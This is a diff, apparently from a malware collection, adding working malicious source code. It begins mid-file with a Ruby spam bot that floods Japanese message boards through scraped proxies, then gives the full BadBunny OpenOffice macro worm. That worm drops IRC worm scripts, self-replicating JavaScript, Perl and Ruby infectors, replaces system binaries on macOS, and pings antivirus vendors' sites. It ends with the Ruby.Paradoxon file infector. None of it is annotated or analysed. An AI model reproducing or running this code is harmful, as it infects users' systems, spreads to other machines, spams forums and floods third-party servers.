Firefox/0.9.3" + $category, $bbs = *$bbs_arr[rand($bbs_arr.size)] + http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt") + $suret = http.rsp.body.split("\n") + sss = [] + $suret.each{|sure| + if !sure.match(/.*\(10000?\)/) + sure.match(/^(\d+)/) + sss.push $1 + end + } + return sss; +end +#p '書き込み開始' + +agent = Web::Agent.new +agent.setup +agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3" +agent.get('http://www.cybersyndrome.net/pla.html') +agent.rsp.body.match("") +proxy = [] +while($'.match(/\"A\">([^<>]*)<\/a>/)) #' + proxy.push($~[1]) +end +proxy.delete_if{|pr| + pr.match(/(80)|(8080)/) +} +proxy.collect! do |i| + i.split(':') +end + +count = 0 +while(1) + sure = getThreads; + if rand(6) == 0 + for ituuu in 0..9 + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/" + age.get 'http://yy14.kakiko.com/landstriker/subject.txt' + suret = age.rsp.body.split("\n") + sss = [] + suret.each{|sure| + if !sure.match(/.*\(10000?\)/) + sure.match(/^(\d+)/) + sss.push $1 + end + } + Thread.new{ + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/" + age.req.header['content-type']='application/x-www-form-urlencoded' + ran = rand(proxy.size) + if rand(2) == 1 + age.proxy_host = proxy[ran][0] + age.proxy_port = proxy[ran][1] + end + if sss.size != 0 + if $id == '' + age.req.form.add 'FROM', (10000 + rand(90000)).to_s + age.req.form.add 'mail', 'sage' + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words) + else + names + age.req.form.add 'FROM', $id + age.req.form.add 'mail', '' + massage = '' + massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1 + massage += rtx + "\n" if $rtx + massage += aretool + "\n" if $are + massage += "RoAddr\n" if $roaddr && rand(2) == 1 + massage += "KORE\n" if $korepath.size > 0 + massage += $charas + age.req.form.add 'MESSAGE', massage + end + age.req.form.add 'bbs', 'landstriker' + age.req.form.add 'key', sure[rand(sure.size)] + age.req.form.add 'time', Time.now.to_i.to_s + age.req.form.add 'submit', '書き込む' + age.post('http://yy14.kakiko.com/test.bbs.cgi') + else + suret[rand(suret.size)].match(/,(.+)\(/) + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + age.req.form.add 'FROM', '' + age.req.form.add 'mail', '' + age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words) + age.req.form.add 'bbs', $bbs + age.req.form.add 'time', Time.now.to_s.toi + age.req.form.add 'submit', '新規スレッド作成' + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + end + } + end + else + if sure.size != 0 + loop do + sleep $wait_time + r = rand proxy.size + Thread.new(r, proxy){|ran, pro| + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + if rand(2) == 1 + age.proxy_host = pro[ran][0] + age.proxy_port = pro[ran][1] + end + if $id == '' + age.req.form.add 'NAME', (10000 + rand(90000)).to_s + age.req.form.add 'MAIL', 'sage' + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ') + else + names + age.req.form.add 'NAME', $id.chop.chop + age.req.form.add 'MAIL', '' + massage = '' + massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1 + massage += rtx + "\n" if $rtx + massage += aretool + "\n" if $are + massage += "RoAddr\n" if $roaddr && rand(2) == 1 + massage += "KORE\n" if $korepath.size > 0 + massage += $charas + age.req.form.add 'MESSAGE', massage + end + age.req.form.add 'BBS', $bbs + age.req.form.add 'KEY', sure[rand(sure.size)] + age.req.form.add 'TIME', Time.now.to_s.to_i + age.req.form.add 'DIR', $category + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + } + count += 1 + break if count % 10 == 0 + end + else + $suret[rand($suret.size)].match(/,(.+)\(/) + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + age.req.form.add 'NAME', '' + age.req.form.add 'MAIL', '' + age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ') + age.req.form.add 'BBS', $bbs + age.req.form.add 'TIME', Time.now.to_s.to_i + age.req.form.add 'DIR', $category + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + end + end +end + +while Thread.list.size > 2 + sleep 10 +end diff --git a/Ruby/Virus.Ruby.Badbunny.a b/Ruby/Virus.Ruby.Badbunny.a new file mode 100644 index 00000000..05429dee --- /dev/null +++ b/Ruby/Virus.Ruby.Badbunny.a @@ -0,0 +1,314 @@ +Dim Url As String +Dim myFileProp as Object + +Sub badbunny() +rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz] +Dim mEventProps(1) as new com.sun.star.beans.PropertyValue +mEventProps(0).Name = "EventType" +mEventProps(0).Value = "StarBasic" +mEventProps(1).Name = "Script" +mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame" +com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN +ThisComponent.LockControllers +oDocument = ThisComponent +otext=oDocument.text +ocursor=otext.createtextcursor() +otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false) +url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg") +oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() ) +msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\" +call ping +end sub + +sub startgame +if GetGUIType =1 then 'windows +call win +end if +if GetGUIType =3 then 'MacOS +call mac +end if +if GetGUIType =4 then 'linux +call lin +end if +end sub + +sub win +Dim dirz As String +Dim dummy() +Dim iVar As Integer +Dim Args(0) as new com.sun.star.beans.PropertyValue +Args(0).Name = "MacroExecutionMode" +Args(0).Value = _ +com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN +ThisComponent.LockControllers + datei="c:\badbunny.odg" + dateiurl=converttourl(datei) + odoc=thisComponent + odoc.storeasurl(dateiurl,dummy()) +dirz=Environ ("programfiles") + +Open "c:\drop.bad" For Output As #1 +Print #1, "[script]" +Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]" +Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*" +Print #1, "n2=on 1:start:{" +Print #1, "n3= /if $day == Friday { /echo }" +Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan" +Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-" +Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-" +Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me" +Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me" +Print #1, "n9=on 1:part:#:{" +Print #1, "n10=set %M_E $me" +Print #1, "n11=set %NickName $nick" +Print #1, "n12=set %ccd .dcc" +Print #1, "n13= if %NickName != %M_E {" +Print #1, "n14= /q %NickName lets do it like a rabbit...;)" +Print #1, "n15= /msg %NickName Be my bunny!" +Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg" +Print #1, "n17= }" +Print #1, "n18=}" +Close #1 + +if ( Dir(dirz &"\mirc") <> "") then +Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini" +end if +if ( Dir("c:\mirc") <> "") then +Filecopy "c:\drop.bad" , "c:\mirc\script.ini" + +end if +if ( Dir(dirz &"\mirc32") <> "") then +Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini" +end if +if ( Dir("c:\mirc32") <> "") then +Filecopy "c:\drop.bad" , "c:\mirc32\script.ini" +end if + +Open "c:\badbunny.js" For Output As #2 +Print #2, "// BadBunny" +Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))" +Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)" +Print #2, "var OurCode=me.Read(1759)" +Print #2, "me.Close()" +Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''" +Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()" +Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }" +Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)" +Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)" +Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())" +Print #2, "{" +Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")" +Print #2, "{" +Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)" +Print #2, "var Marker=filez.Read(11)" +Print #2, "var allinone=Marker+filez.ReadAll()" +Print #2, "filez.Close()" +Print #2, "if(Marker!=""// BadBunny"")" +Print #2, "{" +Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)" +Print #2, "filez.Write(OurCode+allinone)" +Print #2, "filez.Close()" +Print #2, "}" +Print #2, "}" +Print #2, "}" +Print #2, "function foundit()" +Print #2, "{" +Print #2, "fcodea=''; count=0; randon='';" +Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }" +Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }" +Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)" +Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '" +Print #2, "i+=fcodea.length;" +Print #2, "}" +Print #2, "//->" +Close #2 +Shell("c:\badbunny.js",0) +oDoc.store() +End Sub + +sub lin() +'xchat2worm part by WarGame +dim HomeDir as string +dim xchat2script as string +dim perlvir as string +dim cmd as string +dim WgeT as string +Dim dummy() +Dim iVar As Integer +Dim Args(0) as new com.sun.star.beans.PropertyValue +Args(0).Name = "MacroExecutionMode" +Args(0).Value = _ +com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN +ThisComponent.LockControllers + datei="/tmp/badbunny.odg" + dateiurl=converttourl(datei) + odoc=thisComponent + odoc.storeasurl(dateiurl,dummy()) + +' get home dir +HomeDir = Environ("HOME") + +'build the path of our xchat2 script +if HomeDir = "" then +' I could not get $HOME ! + +else +xchat2script = HomeDir & "/.xchat2/badbunny.py" + +' drop the python script +Open xchat2script For Output As #1 +print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34) +print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34) +print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34) +print #1,"import xchat" +print #1,"def onkick_cb(word, word_eol, userdata):" +print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:" +print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")" +print #1," return xchat.EAT_NONE" +print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)" +close #1 +endif + +'drop the perl virus +perlvir = HomeDir & "/BadBunny.pl" +open perlvir for output as #1 +print #1,"#BadBunny" +print #1,"open(File,$0);@MyCode = ;close(File);" +print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){" +print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){" +print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}" +close #1 +cmd = "perl " & perlvir +shell(cmd,0) + +oDoc.store() +end sub + +sub mac() +Dim iVar As Integer +iVar = Int((15 * Rnd) -2) +Select Case iVar +Case 1 To 5 +call one +Case 6, 7, 8 +call two +Case Is > 8 And iVar < 11 +call one +Case Else +call two +End Select +end sub + +sub one () +'thx to skyout +Open "badbunny.rb" For Output As #1 +print #1,"#!/usr/bin/env ruby" +print #1,"require 'ftools'" +print #1,"def replacecmd(cmdname, dirpath)" +print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")" +print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)" +print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n""" +print #1,"oldcmd.puts ""puts \""\""" +print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\""""" +print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny""""" +print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut""" +print #1,"oldcmd.puts ""puts \""\""""" +print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\""""" +print #1,"oldcmd.puts ""puts \""Executing in ...\""""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""3\""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""2\""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""1\""" +print #1,"oldcmd.puts ""sleep 1""" +print #1,"oldcmd.puts ""puts \""\""" +print #1,"oldcmd.puts ""for $args in $* do""" +print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\""" +print #1,"oldcmd.puts ""end""" +print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\""" +print #1,"oldcmd.puts ""exit 0""" +print #1,"end" +print #1,"$binary_dirs = Array.new" +print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]" +print #1,"for $dir in $binary_dirs do" +print #1,"if File.directory?($dir) then" +print #1,"if File.writable?($dir) then" +print #1,"Dir.open($dir).each do |file|" +print #1,"next if file =~ /^\S+_/ || file == ""."" || file == ""..""" +print #1,"replacecmd(file, $dir)" +print #1,"end" +print #1,"end" +print #1,"end" +print #1,"end" +print #1,"exit 0" +close #1 +Shell("badbunny.rb",0) +end sub + +sub two() 'thx to SPTH for this... +Open "badbunnya.rb" For Output As #2 +print #2,"# BADB" +print #2,"mycode=""" +print #2,"mych=File.open(__FILE__)" +print #2,"myc=mych.read(1)" +print #2,"while myc!=nil" +print #2,"mycode+=myc" +print #2,"myc=mych.read(1)" +print #2,"end" +print #2,"mycode=mycode[mycode.length-734,734]" +print #2,"cdir = Dir.open(Dir.getwd)" +print #2,"cdir.each do |a|" +print #2,"if File.ftype(a)==""file"" then" +print #2,"if a[a.length-3, a.length]=="".rb"" then" +print #2,"if a!=File.basename(__FILE__) then" +print #2,"fcode=""" +print #2,"fle=open(a)" +print #2,"badb=fle.read(1)" +print #2,"while badb!=nil" +print #2,"fcode+=badb" +print #2,"badb=fle.read(1)" +print #2,"end" +print #2,"fle.close" +print #2,"if fcode[fcode.length-732,4]!=""BADB"" then" +print #2,"fcode=fcode+13.chr+10.chr+mycode" +print #2,"fle=open(a,""w"")" +print #2,"fle.print fcode" +print #2,"fle.close" +print #2,"end" +print #2,"end" +print #2,"end" +print #2,"end" +print #2,"end" +print #2,"cdir.close" +close #2 +Shell("badbunnya.rb",0) +End Sub + +sub ping() +Shell("ping -l 5000 -t www.ikarus.at",0) +Shell("ping -l 5000 -t www.aladdin.com",0) +Shell("ping -l 5000 -t www.norman.no",0) +Shell("ping -l 5000 -t www.norman.com",0) +Shell("ping -l 5000 -t www.kaspersky.com",0) +Shell("ping -l 5000 -t www.kaspersky.ru",0) +Shell("ping -l 5000 -t www.kaspersky.pl",0) +Shell("ping -l 5000 -t www.grisoft.cz",0) +Shell("ping -l 5000 -t www.symantec.com",0) +Shell("ping -l 5000 -t www.proantivirus.com",0) +Shell("ping -l 5000 -t www.f-secure.com",0) +Shell("ping -l 5000 -t www.sophos.com",0) +Shell("ping -l 5000 -t www.arcabit.pl",0) +Shell("ping -l 5000 -t www.arcabit.com",0) +Shell("ping -l 5000 -t www.avira.com",0) +Shell("ping -l 5000 -t www.avira.de",0) +Shell("ping -l 5000 -t www.avira.ro",0) +Shell("ping -l 5000 -t www.avast.com",0) +Shell("ping -l 5000 -t www.virusbuster.hu",0) +Shell("ping -l 5000 -t www.trendmicro.com",0) +Shell("ping -l 5000 -t www.bitdefender.com",0) +Shell("ping -l 5000 -t www.pandasoftware.comm",0) +Shell("ping -l 5000 -t www.drweb.com",0) +Shell("ping -l 5000 -t www.drweb.ru",0) +Shell("ping -l 5000 -t www.viruslist.com",0) +end sub \ No newline at end of file diff --git a/Ruby/Virus.Ruby.Pydoxon.b b/Ruby/Virus.Ruby.Pydoxon.b new file mode 100644 index 00000000..92417383 --- /dev/null +++ b/Ruby/Virus.Ruby.Pydoxon.b @@ -0,0 +1,26 @@ +# RUBY.Paradoxon +mycode=File.open(__FILE__).read(630) +cdir = Dir.open(Dir.getwd) + cdir.each do |a| + if File.ftype(a)=="file" then + if a[a.length-3, a.length]==".rb" then + if a!=File.basename(__FILE__) then + fcode="" + fle=open(a) + spth=fle.read(1) + while spth!=nil + fcode+=spth + spth=fle.read(1) + end + fle.close + if fcode[7,9]!="Paradoxon" then + fcode=mycode+13.chr+10.chr+fcode + fle=open(a,"w") + fle.print fcode + fle.close + end + end + end + end + end +cdir.close \ No newline at end of file